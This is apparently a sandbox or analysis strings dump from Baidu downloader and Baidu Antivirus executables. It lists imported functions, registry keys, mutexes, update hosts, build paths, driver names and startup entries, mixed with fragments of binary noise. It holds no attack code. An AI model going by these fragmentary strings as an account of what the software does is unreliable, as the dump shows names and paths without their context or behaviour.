%s='%s'

%s="%s"

PKEY_CUSTOMNAME

PKEY_PRODUCTNAME

PKEY_ISSHOW

PKEY_EXITTIME

PKEY_CUSTOMID

PKEY_START_STATUS

PKEY_GUID

PKEY_MINORVERSION

PKEY_MAJORVERSION

PKEY_COREVERSION

PKEY_EXEVERSION

PKEY_UPDATESERVERPORT

PKEY_UPDATESERVERIP

PKEY_PSHASH

PKEY_PSNAME

PKEY_EXHASH

PKEY_EXNAME

PKEY_TNHASH

PKEY_TNNAME

PKEY_COREHASH

PKEY_CORENAME

PKEY_EXEHASH

PKEY_EXENAME

PKEY_UPDATEURL

PKEY_FILENAME

PKEY_RESULT

up.download.iyuntian.com

PKEY_TTL

PKEY_ISFIX

PKEY_VERSION

PKEY_FILEEMULE_HASH

PKEY_FILEEMULE_SIZE

PKEY_FILEEMULE_NAME

PKEY_FILEBT_HASH

PKEY_FILEBT_SIZE

PKEY_FILEBT_NAME

PKEY_FILECORE_HASH

PKEY_FILECORE_SIZE

PKEY_FILECORE_NAME

PKEY_URL

PKEY_PERIOD

kernel32.dll

.mixcrt

KERNEL32.DLL

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

mscoree.dll

GetProcessWindowStation

USER32.DLL

operator

portuguese-brazilian

FhModule = %u, pfunc = %u

DbgHelp.dll

crash.dmp

0xX

DlBugReport.ini

DlBugReport.dat

%Y-%m-%d %H:%M:%S

%d.%d.%d.%d

,d-d-d d:d:d

[ 0xX ] %s [%s]

Error: Write address 0xX

Error: Read address 0xX

version = %s

%s-----------------------------------

Type: %s

Address: 0xX

bddownloader.exe

EXCEPTION_FLT_INVALID_OPERATION

EXCEPTION_FLT_DENORMAL_OPERAND

(%d,%d,%d,%d)

0xX:

%s::x;

0xX[%X] %s:

%s::x

Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag

Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

d:\dl\DownloadProxy_proj\Output\Release\bddownloader.pdb

GetProcessHeap

CreateIoCompletionPort

GetCPInfo

GetConsoleOutputCP

KERNEL32.dll

USER32.dll

GDI32.dll

RegDeleteKeyW

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyW

RegOpenKeyExA

ADVAPI32.dll

ShellExecuteW

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

COMCTL32.dll

WS2_32.dll

VERSION.dll

NetWkstaTransportEnum

NETAPI32.dll

PSAPI.DLL

imagehlp.dll

zcÃ

'DownloadProxy.EXE'

BDDownloadProxy.Downloader.1 = s 'Downloader Class'

CLSID = s '{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}'

BDDownloadProxy.Downloader = s 'Downloader Class'

CurVer = s 'BDDownloadProxy.Downloader.1'

ForceRemove {91B5E4DE-4C97-41CD-9F94-84BFAABB7371} = s 'Downloader Class'

ProgID = s 'BDDownloadProxy.Downloader.1'

VersionIndependentProgID = s 'BDDownloadProxy.Downloader'

'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'

stdole2.tlbWWW

cuiMsgTypeWWW

pMsgParamWWWd

6|pTaskUrl

Created by MIDL version 6.00.0366 at Thu May 22 14:49:00 2014

&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU

"7,,11,,7"

2222222222222222

11///20.

##!!! !!!##

.02///11

mM............................................................Mm

mM..........................................Mm

(((((((JgT..TgJ(((((((

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

bdpunchproxy.dll

bddownload_config.xml

dl.dll

\bddownloader.exe

{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}

CLSID\%s\LocalServer32

{%X-%X-%X-%X-%X%X}

B.tlb

Mscoree.dll

BDDownloadProxy.Downloader.1

\Installlog.txt

\bdcomproxy.dll

\7z.dll

\bdpunchproxy.dll

\dl.dll

regsvr32.exe

Kernel32.dll

7z.dll

C\StringFileInfo\xx\

netsh.exe

\\.\PhysicalDrive%d

\\.\Scsi%d:

oiphlpapi.dll

\Global.db

PBDD_Temp_Exe

%*.*f

: %s/s

%s: %s

\TDConfig.ini

H\set.log

%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe

(1-10240)

1.0.108.0

BaiduHips.exe_3260:

.text

`.rdata

@.data

.rsrc

c:\clientci\workspace\hips_v1.1_fix_compile\basic\Output\release\BaiduHips.pdb

?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ

BDLogicUtils.dll

KERNEL32.dll

USER32.dll

MSVCP80.dll

_amsg_exit

_wcmdln

MSVCR80.dll

_crt_debugger_hook

VERSION.dll

@BaiduHips.exe

%d.%d.%d.%d

BaiduHipsIU.dll

BaiduHipsCore.dll

1.1.0.733

BaiduHips.exe

BaiduAnSvc.exe_3664:

.text

`.rdata

@.data

.rsrc

@.reloc

..\src\google\protobuf\message_lite.cc

CHECK failed: !coded_out.HadError():

%d.%d.%d

libprotobuf %s %s:%d] %s

..\src\google\protobuf\stubs\common.cc

..\src\google\protobuf\io\coded_stream.cc

..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc

1.2.5

{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}

1.0.1.1

%d.%d

d-d-d d:d:d

RegKey

CryptMsgGetParam

CryptMsgClose

CertFindCertificateInStore

CertFreeCertificateContext

CertCloseStore

CertGetNameStringW

CryptCATCatalogInfoFromContext

RootKey

SubKey

IsNative64Key

Content-Length:%d

s.x.baidu.com

c:\clientci\workspace\bdm_v3.0_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp

.\update.pb.cc

%s:%u

%u.%u.%u.%u

addr %s not good...

Unsupported Media Type

HTTP Version not supported

HTTP/1.0

HTTP/1.1

1.0.0.1

.\header.pb.cc

https

ftpes

ftps

tftp

% ;?:@=&,$/-_!.~*()

System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

%s\Connection

%s>

%s="%s"

%s='%s'

version="%s"

encoding="%s"

standalone="%s"

c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BaiduAnSvc.pdb

?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ

BDLogicUtils.dll

?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ

BDMFrameWork.dll

SHDeleteKeyW

SHLWAPI.dll

BDMSkin.dll

GetProcessHeap

GetWindowsDirectoryW

GetSystemWindowsDirectoryW

KERNEL32.dll

USER32.dll

RegCreateKeyExW

RegOpenKeyExW

RegCloseKey

RegQueryInfoKeyW

RegEnumKeyExW

RegSetKeySecurity

RegFlushKey

RegNotifyChangeKeyValue

RegGetKeySecurity

RegDeleteKeyW

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHFileOperationW

SHELL32.dll

ole32.dll

MSVCP80.dll

PSAPI.DLL

WS2_32.dll

MSVCR80.dll

_amsg_exit

_crt_debugger_hook

USERENV.dll

WTSAPI32.dll

imagehlp.dll

InternetCrackUrlW

HttpOpenRequestW

HttpQueryInfoW

HttpSendRequestW

WININET.dll

NETAPI32.dll

RegOpenKeyExA

BaiduAnSvc.exe

.?AV?$CSingleton@VCRtpPluginContainer@@@BDMBase@@

.?AVCRtpPluginContainer@@

.?AV?$CSingleton@VCRTPServer@@@utils@@

.?AVCRTPServer@@

.?AVCBDMOptionsReportRecord@@

.?AVCBDMLauchReportRecord@@

.?AVTSMsg@@

.?AVIBDMMsg@@

.?AVTSMsgMap@@

.?AVITSMsgMap@@

.?AVTSMsgDispatcher@@

.?AVITSMsgDispatcher@@

.?AVTSMsgStub@@

.?AVITSMsgStub@@

.?AVCCmdPluginLauncher@@

.?AVCExePluginLauncher@@

.?AVIPluginCmdExecutor@@

.?AUPluginInfoPassiveSaver@@

.?AVheader@http@bena@@

.?AVresponse@http@bena@@

.?AVrequest@http@bena@@

Ã¿F=

6%7s7

7!8(868/:

?&???[?{?

2 2$2(2,20242

; ;$;(;,;0;4;

HKEY_LOCAL_MACHINE\Software

HKEY_CURRENT_USER\Software\Classes\CLSID

HKEY_CURRENT_USER\Software\Classes\DirectShow

HKEY_CURRENT_USER\Software\Classes\Interface

HKEY_CURRENT_USER\Software\Classes\Media Type

HKEY_CURRENT_USER\Software\Classes\MediaFoundation

HKEY_CLASSES_ROOT\CLSID

HKEY_CLASSES_ROOT\DirectShow

HKEY_CLASSES_ROOT\Interface

HKEY_CLASSES_ROOT\Media Type

HKEY_CLASSES_ROOT\MediaFoundation

HKEY_LOCAL_MACHINE\Software\Wow6432Node

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type

HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation

HKEY_CLASSES_ROOT\Wow6432Node\CLSID

HKEY_CLASSES_ROOT\Wow6432Node\DirectShow

HKEY_CLASSES_ROOT\Wow6432Node\Interface

HKEY_CLASSES_ROOT\Wow6432Node\Media Type

HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation

ntdll.dll

EXPLORER.EXE

explorer.exe

baiduanTray.exe

"%s" -stmd=12

winlogon.exe

SOFTWARE\Microsoft\Windows\CurrentVersion

BaiduAnTray.exe

"{0}\{1}" {2}

SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

BaiduAn.exe

BaiduAnUpdate.exe

BaiduAnBugRpt.exe

Global\BDMMutex{B2F10594-7119-4649-9326-AF1890C5CE56}

BDAFileHelper.exe

Global\BDMEvent{8C345A9A-F601-405d-AB4A-B459CD5E369E}

BDALeakfixer.exe

Global\TBD_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}

\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}

BDASoftmgr.exe

BDASWHelper.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn

\BDPreL.exe

\RTPPlugins\RtpContainerConfig.xml

C:\test.exe

d-d-d d:d:d d

d:d:d

%s(%d)

Last Error : %u(%s)

Global\BDMMutex{32EB1BC7-A5CD-4356-A6B1-54D7BF690CA7}

Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}

BDMNet.dll

\kernel32.dll

Windows 8.1

Windows 8.0

Windows 7

Windows Vista

Windows 7

Windows Vista

Windows Server 2003,

Windows XP

Windows 2000

Windows NT

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009

Windows 95

Windows 98

Windows ME

Kernel32.dll

r.dll

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

okernel32.dll

HKEY_USERS

@Wintrust.dll

Crypt32.dll

xxxxxxxxxxxxxxxx

Software\Microsoft\Windows NT\CurrentVersion\Time Zones\

Software\Microsoft\Windows NT\CurrentVersion\ProfileList\

Software\Microsoft\Windows NT\CurrentVersion\Print\

Software\Microsoft\Windows NT\CurrentVersion\Ports\

Software\Microsoft\Windows NT\CurrentVersion\Perflib\

Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\

Software\Microsoft\Windows NT\CurrentVersion\Language Pack\

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\

Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\

Software\Microsoft\Windows NT\CurrentVersion\Fonts\

Software\Microsoft\Windows NT\CurrentVersion\FontMapper\

Software\Microsoft\Windows NT\CurrentVersion\FontLink\

Software\Microsoft\Windows NT\CurrentVersion\FontDpi\

Software\Microsoft\Windows NT\CurrentVersion\Console\

Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\

Software\Microsoft\Windows\CurrentVersion\Setup\

Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\

Software\Microsoft\Windows\CurrentVersion\Policies\

Software\Microsoft\Windows\CurrentVersion\Group Policy\

Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\

Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\

Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\

Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\

Software\Microsoft\Windows\CurrentVersion\App Paths\

Software\Microsoft\SystemCertificates\

Software\Microsoft\EnterpriseCertificates\

system32\winlogon.exe

F6BE417DD-264A-4678-A036-74D2173ECCEB

{X-X-X-XX-XXXXXX}

D823ABCA-A92F-429d-9E11-3779B5F682AA

\NotInstalledPlugin.xml

\GlobalPluginInfo.xml

\LocalPluginInfo.xml

\PluginSetup.xml

\HotPlugins.xml

\HotPlugin.bnr

PluginSetup.xml

{E5B65788-3C2C-4F59-92E7-58C9205BC66E}

BUninstalledPlugins.xml

/handle=%d /supplyid=%d /installmode=2 /S /D=%s

BPackCache.xml

BDMDownload.dll

B##cmd:

BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}

BDMUpdate.dll

.bdtmp

.old_

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0

\Global.db

Diphlpapi.dll

D\\.\PhysicalDrive%d

\\.\Scsi%d:

%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\

3.0.0.3971

BaiduanSvc.exe

BDASWDeskGuide.exe_228:

.text

`.rdata

@.data

.rsrc

@.reloc

T$.SR

inflate 1.2.5 Copyright 1995-2010 Mark Adler

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

1.2.5

{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}

CryptMsgGetParam

CryptMsgClose

CertFindCertificateInStore

CertFreeCertificateContext

CertCloseStore

CertGetNameStringW

CryptCATCatalogInfoFromContext

c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BDASWDeskGuide.pdb

?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ

BDMFrameWork.dll

SHLWAPI.dll

BDMSkin.dll

KERNEL32.dll

EnumWindows

USER32.dll

GDI32.dll

RegCloseKey

RegOpenKeyExW

ADVAPI32.dll

ole32.dll

MSVCP80.dll

MSVCR80.dll

_amsg_exit

_wcmdln

_crt_debugger_hook

GetProcessHeap

GetWindowsDirectoryW

SHELL32.dll

imagehlp.dll

BDASWDeskGuide.exe

7,787\7|7

SWDesktopHide.xml

SWDesktopGuideWnd.xml

bg_guide_left.png

bg_guide_right.png

SWDesktopGuide{ACE6587A-7508-4cbe-93BD-A2AAE304F5B5}

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

CommonRes.rdb

file='skin_image16.png' xtiled='true' ytiled='true'

skin_image16.png

file='%s' xtiled='true' ytiled='true'

Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}

@Wintrust.dll

Crypt32.dll

6BE417DD-264A-4678-A036-74D2173ECCEB

%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\

3.0.0.3967

SWDesktopGuide.exe

baiduanTray.exe_3012:

.text

`.rdata

@.data

.rsrc

@.reloc

D$u%SVW
;9u.SWj
8.uwS
n<.ut>;:u.SWj
PSSSSSSh
L$XQSSh
SPSSSSh
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
..\src\google\protobuf\generated_message_reflection.cc
CHECK failed: (from.GetDescriptor()) == (descriptor):
..\src\google\protobuf\message.cc
: Tried to copy from a message with a different type.to:
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
..\src\google\protobuf\io\coded_stream.cc
%d.%d.%d
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\descriptor.cc
". To use it here, please add the necessary import.
", which is not imported by "
$0$1 = $2
$0$1 $2 $3 = $4
.PLACEHOLDER_VALUE
.placeholder.proto
map key must name a scalar or string field.
map_key must not name a repeated field.
CHECK failed: dynamic.get() != NULL:
.foo = value".
.dummy
FieldDescriptorProto.extendee set for non-extension field.
FieldDescriptorProto.extendee not set for extension field.
Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "
CHECK failed: !out.HadError():
" is repeated. Repeated options are not supported.
Import "
Missing field: FileDescriptorProto.name.
File recursively imports itself:
..\src\google\protobuf\wire_format.cc
..\src\google\protobuf\reflection_ops.cc
..\src\google\protobuf\extension_set.cc
CHECK failed: iter != extensions_.end():
..\src\google\protobuf\extension_set_heavy.cc
\xx
..\src\google\protobuf\stubs\strutil.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
..\src\google\protobuf\descriptor.pb.cc
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google.protobuf"G
2$.google.protobuf.FileDescriptorProto"
2 .google.protobuf.DescriptorProto
2$.google.protobuf.EnumDescriptorProto
2'.google.protobuf.ServiceDescriptorProto
2%.google.protobuf.FieldDescriptorProto
.google.protobuf.FileOptions
.google.protobuf.SourceCodeInfo"
2/.google.protobuf.DescriptorProto.ExtensionRange
.google.protobuf.MessageOptions
2 .google.protobuf.FieldDescriptorProto.Label
2*.google.protobuf.FieldDescriptorProto.Type
.google.protobuf.FieldOptions"
2).google.protobuf.EnumValueDescriptorProto
.google.protobuf.EnumOptions"l
2!.google.protobuf.EnumValueOptions"
2&.google.protobuf.MethodDescriptorProto
.google.protobuf.ServiceOptions"
.google.protobuf.MethodOptions"
2).google.protobuf.FileOptions.OptimizeMode:
2$.google.protobuf.UninterpretedOption":
2$.google.protobuf.UninterpretedOption*
2#.google.protobuf.FieldOptions.CType:
experimental_map_key
2$.google.protobuf.UninterpretedOption"/
2-.google.protobuf.UninterpretedOption.NamePart
2(.google.protobuf.SourceCodeInfo.Location
com.google.protobufB
Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:
..\src\google\protobuf\io\tokenizer.cc
Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:
Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:
..\src\google\protobuf\stubs\substitute.cc
..\src\google\protobuf\dynamic_message.cc
..\src\google\protobuf\text_format.cc
..\src\google\protobuf\descriptor_database.cc
Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().
unsupported version
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
{C6642F75-8DBE-473d-A98B-940F84EF702C}
CreateReportClient
ReleaseReportClient
.\Global\ReportBase\msg.pb.cc
datapkg.FieldsList
datapkg.DataType
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
kernel32.dll
c:\clientci\workspace\bdm_v3.0_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
.\filedispatch\FileDispatch.pb.cc
config_service.proto
.\config_service.pb.cc
config_service.proto"(
cmd_list
.ConfigItem"@
.ResultSet
asio.misc
asio.misc error
boost thread: trying joining itself
thread.entry_event
thread.exit_event
1.0.1.1
%d.%d

d-d-d d:d:d

RegKey

RootKey

SubKey

IsNative64Key

CryptMsgGetParam

CryptMsgClose

CertFindCertificateInStore

CertFreeCertificateContext

CertCloseStore

CertGetNameStringW

CryptCATCatalogInfoFromContext

System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

%s\Connection

Content-Length:%d

s.x.baidu.com

.\update.pb.cc

%s:%u

%u.%u.%u.%u

addr %s not good...

Unsupported Media Type

HTTP Version not supported

HTTP/1.0

HTTP/1.1

1.0.0.1

.\header.pb.cc

https

ftpes

ftps

tftp

% ;?:@=&,$/-_!.~*()

X;

%s>

%s="%s"

%s='%s'

version="%s"

encoding="%s"

standalone="%s"

c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BaiduAnTray.pdb

WS2_32.dll

?TranslateMessage@IControlManger@ExpandInterface@BDMSkin@@SA_NQAUtagMSG@@@Z

BDMSkin.dll

?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ

BDLogicUtils.dll

BDMCommon.dll

?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ

BDMFrameWork.dll

SHDeleteKeyW

SHLWAPI.dll

GetProcessHeap

CreateIoCompletionPort

GetWindowsDirectoryW

GetSystemWindowsDirectoryW

KERNEL32.dll

USER32.dll

GDI32.dll

RegCloseKey

RegOpenKeyExW

RegCreateKeyExW

RegDeleteKeyW

RegFlushKey

RegOpenKeyW

RegEnumKeyExW

RegQueryInfoKeyW

RegSetKeySecurity

RegNotifyChangeKeyValue

RegGetKeySecurity

RegOpenKeyExA

ADVAPI32.dll

ShellExecuteW

ShellExecuteExW

SHFileOperationW

SHELL32.dll

ole32.dll

OLEAUT32.dll

MSVCP80.dll

MSVCR80.dll

_amsg_exit

_wcmdln

_crt_debugger_hook

PSAPI.DLL

WTSAPI32.dll

USERENV.dll

NETAPI32.dll

imagehlp.dll

InternetCrackUrlW

HttpOpenRequestW

HttpQueryInfoW

HttpSendRequestW

WININET.dll

VERSION.dll

?SetAlpha@CBDMLabelUI@BDMSkin@@UAEXE@Z

?StartFadeInFadeOut@CBDMControlUI@BDMSkin@@UAEXEEKK_N0@Z

BaiduAnTray.exe

??_B?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@51

?get_const_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAABV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ

?get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ

?get_mutable_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ

?instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@0AAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@A

?is_destroyed@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SA_NXZ

?t@?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@4V?$singleton_wrapper@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@detail@34@A

.?AVCBDCmdParser@BDMLogicMisc@@

.?AVControlMgrMsgFilter@CBDMTrayApp@@

.?AVCExternalMsgLoop@@

.?AVCBDMConfigReportRecord@@

.?AVCPluginMenuItemExecutor@@

.?AVIPluginCmdExecutor@@

.?AVCBDMLauchReportRecord@@

.?AVCBDMCommonMsgBox@@

.?AV?$BDMNotifyDelegate@VCBDMCommonMsgBox@@V1@@ExpandInterface@BDMSkin@@

.?AVReportMessageBase@ns_reportbase@ns_global@@

.?AVRegSystemCallPassThrough@ns_common@@

.?AVReportClient@ns_reportbase@ns_global@@

.?AVTSMsg@@

.?AVIBDMMsg@@

.?AVTSMsgMap@@

.?AVITSMsgMap@@

.?AVTSMsgDispatcher@@

.?AVITSMsgDispatcher@@

.?AVTSMsgStub@@

.?AVITSMsgStub@@

.?AUPluginInfoPassiveSaver@@

.?AVCCmdPluginLauncher@@

.?AVCExePluginLauncher@@

.?AVheader@http@bena@@

.?AVresponse@http@bena@@

.?AVrequest@http@bena@@

#include "windows.h"

Ã¿F=

9(9.949:9@9

6|7u7

878W8%9s9

3i4-6}6$7F7

(0,00040807$8(8,80848
3-4I4Q4f4}4
:.;@;`;~;
6.7@7]7~7
9,:::\:}:
= >5>=>"?5?
1,2v2
203c3v3
3@4c4v4
4P5c5v5
5`6s6
3L4V4
7u7C7H7X7f7l7|7
8â€˜9U9l9v9
0'0-03090
7'767`8|8
:%:*:7:{:
6o6W6\6f6p6~6
5#5)565?5^5
4!4.434>4
?,?6?>?`?
5/686@6`6
5(545@5\5
:&:/:8:[:
>%>,>3>:>
0,20242822 2$2(2,20242
3 3$3(3|3
9 9$9(9,909
0$0,040@0|0
@01234567
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
\iexplore.exe
\Internet Explorer\iexplore.exe
%s\baidubrowser.exe
HKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
%d.%d.%d.%d
ntdll.dll
EXPLORER.EXE
explorer.exe
BDMNet.dll
BaiduHips.exe
UDP-ADM_DRVE_ISTL_FID
UDP-ADM_DRVE_OPEN_FID
bdmantivirus\BDKitUtils.dll
system32\DRIVERS\BDMWrench.sys
%s\baidu\baiduan\Config\8001.dat
BaiduAnSvc.exe
%Program Files% (x86)\Baidu
%Program Files%\Baidu
D:\Program Files (x86)\Baidu
D:\Program Files\Baidu
E:\Program Files (x86)\Baidu
E:\Program Files\Baidu
F:\Program Files (x86)\Baidu
F:\Program Files\Baidu
%s\BaiduHips.exe
BaiduProtect.exe
"%s\BaiduProtect.exe" -r
BDMReport.dll
%Program Files% (x86)\Common Files\Baidu
%Program Files%\Common Files\Baidu
D:\Program Files (x86)\Common Files\Baidu
D:\Program Files\Common Files\Baidu
E:\Program Files (x86)\Common Files\Baidu
E:\Program Files\Common Files\Baidu
F:\Program Files (x86)\Common Files\Baidu
F:\Program Files\Common Files\Baidu
%s\baidu\baidusd\Config\900.dat
BaiduSdTray.exe
BaiduSdSvc.exe
"%s\BaiduSdSvc.exe" -r
"%s\BaiduAnSvc.exe" -r

\\.\BDMWrench

Global\BDDefenseDriver{80438582-0F66-44E0-3D2B-2D7E872CBFBB}

CD61BB3A-403D-7650-5D9A-4E57EA1035E6

UDP-ADM_KITUTL_PH_SET_INVALID

UDP-ADM_WMWCH_PH_SET_INVALID

UDP-ADM_ST_ID:%d

UDP-ADM_DRVE_RUN

UDP-ADM_CLIENT_RUN

UDP-ADM_CPY_SYS_FID

UDP-ADM_OPEN_SYS_FID

UDP-ADM_INST_SYS_FID

UDP-ADM_SED_PAVER_FID

UDP-ADM_ATR_SET

UDP-ADM_SED_ATR_FID

UDP-ADM_SED_FSD

UDP-ADM_RPT_FID

UDP-ADM_FSD

\BaiduSdSvc.exe

\BaiduAnSvc.exe

UDP-ADM_RPT_INIT_FID

\system32\drivers\BDMWrench.sys

drivers\BDMWrench.sys

UDP-EVT_WFR

UDP-EVT_WFID

UDP-ADM_SED_PAVER2_FID

\BaiduSdTray.exe" -stmd=3

\BaiduAnTray.exe" -stmd=3

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

C9521EC1-6642-5CF6-8FB9-DE04639593BD

UDP-PS_KITUTI_PH_SET_INVALID

UDP-PS_LD_FID

UDP-PL_SRV_ID:%d

UDP-PL_SRV_RUN

UDP-PL_SRV_INSTPH_FID

UDP-PL_SRV_CK_REG_DAMG

UDP-PL_SRV_REPT01_FID

